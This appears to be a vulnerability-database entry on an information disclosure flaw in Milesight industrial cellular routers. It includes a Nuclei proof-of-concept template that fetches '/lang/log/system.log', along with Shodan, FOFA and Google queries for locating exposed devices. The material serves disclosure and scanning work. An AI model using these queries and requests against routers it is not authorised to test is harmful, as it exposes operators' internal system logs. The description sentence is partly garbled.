milesight-system-log: Milesight Industrial Cellular Routers - Information Disclosure

日期: 2025-08-01 | 影响软件: Milesight | POC: 已公开

漏洞描述

A critical security vulnerability has been identified in Milesight Industrial Cellular Routers, compromising the security discovered that it was publicly disclosing system logs, which included internal information.

PoC代码[已公开]

id: milesight-system-log

info:
  name: Milesight Industrial Cellular Routers - Information Disclosure
  author: ritikchaddha
  severity: high
  description: |
    A critical security vulnerability has been identified in Milesight Industrial Cellular Routers, compromising the security discovered that it was publicly disclosing system logs, which included internal information.
  reference:
    - https://medium.com/@win3zz/inside-the-router-how-i-accessed-industrial-routers-and-reported-the-flaws-29c34213dfdf
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.html:rt_title
    google-query: '"/lang/log/system" ext:log'
    product: ur5x_firmware
    vendor: milesight
    fofa-query: body=rt_title
  tags: milesight,log,exposure,vuln

http:
  - method: GET
    path:
      - '{{BaseURL}}/lang/log/system.log'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'daemon.info'
          - 'authpriv.info'
        condition: and

      - type: word
        part: header
        words:
          - 'text/plain'

      - type: status
        status:
          - 200
# digest: 4a0a0047304502205cecd3b13503059874313d7a1302e00bd21d57c67758ac784c1263e75ff5602e022100d53dc75f75c04d292d36a16e1388620f1adcbffacfa0593a459bd51039d4d4fb:922c64590222798bb761d5b6d8e72950

相关漏洞推荐